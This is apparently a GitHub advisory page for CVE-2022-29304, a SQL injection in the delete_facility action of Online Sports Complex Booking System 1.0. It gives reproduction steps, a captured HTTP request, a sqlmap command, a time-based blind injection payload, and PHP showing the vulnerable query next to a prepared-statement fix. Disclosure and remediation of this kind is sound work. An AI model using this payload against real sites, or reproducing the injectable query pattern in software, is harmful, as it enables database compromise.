CVE-2022-29304: Exploit-/Online Sports Complex Booking System 1.0 SQL Injection(三).md at main · playZG/Exploit-
Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /classes/master.php?f=delete_facility.
Title: Online Sports Complex Booking System 1.0 SQL Injection
Author: Zllggggg
Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html
Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip
Tested on: Windows, MySQL, Apache
After installing the program, log in to the admin back end, find the facility list in the right-hand navigation bar, select a row, and click the delete button.
The request goes to /classes/master.php?f=delete_facility. In delete_facility(), the id parameter is used without any filtering, which is what causes the SQL injection.
Because the parameter is submitted via POST, intercept the request with Burp Suite, save it as a text file, and verify it with sqlmap: sqlmap -r 2.txt
Data packet

```http
POST /scbs/classes/Master.php?f=delete_facility HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 4
Origin: http://localhost
Connection: close
Referer: http://localhost/scbs/admin/?page=facilities
Cookie: PHPSESSID=t261ncguifvbucmfe31v6l74km
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

id=1
```
Payload (sqlmap output)

```
Parameter: id (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4984 FROM (SELECT(SLEEP(5)))KDjE) AND 'riWF'='riWF
```
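The root cause is the unfiltered id in delete_facility(). The following is an added illustration, not code from the scbs project: the vulnerable pattern the advisory describes next to a remediated handler that validates the id and binds it as a parameter. The table name `facility_list`, the `$conn` mysqli handle and the JSON response shape are assumptions for this example.

```php
<?php
// Added example (not the project's own code). $conn is assumed to be an open
// mysqli connection and facility_list the table the delete handler targets.

class Master
{
    private mysqli $conn;

    public function __construct(mysqli $conn)
    {
        $this->conn = $conn;
    }

    // Vulnerable pattern: the raw POST value is interpolated into the SQL text,
    // so a single quote in id terminates the string literal and the remainder
    // of the value is parsed as SQL (the time-based blind case shown above).
    public function delete_facility_vulnerable(): string
    {
        $qry = $this->conn->query(
            "DELETE FROM facility_list WHERE id = '{$_POST['id']}'"
        );
        return $qry ? json_encode(['status' => 'success'])
                    : json_encode(['status' => 'failed', 'msg' => $this->conn->error]);
    }

    // Remediated: reject anything that is not a non-empty string of digits before
    // the database is touched, then bind the value with a prepared statement so
    // it is sent as data and can never change the statement structure.
    public function delete_facility_fixed(): string
    {
        $id = $_POST['id'] ?? '';
        if (!is_string($id) || !ctype_digit($id)) {
            http_response_code(400);
            return json_encode(['status' => 'failed', 'msg' => 'invalid id']);
        }
        $stmt = $this->conn->prepare("DELETE FROM facility_list WHERE id = ?");
        $stmt->bind_param('i', $id);
        if (!$stmt->execute()) {
            return json_encode(['status' => 'failed', 'msg' => $stmt->error]);
        }
        // affected_rows lets the caller tell "no such facility" from success.
        return json_encode(['status' => 'success', 'deleted' => $stmt->affected_rows]);
    }
}
```

The same validate-then-bind pattern applies to every other `f=` action in Master.php that reads an id from the request; the delete handler is only the one this advisory documents.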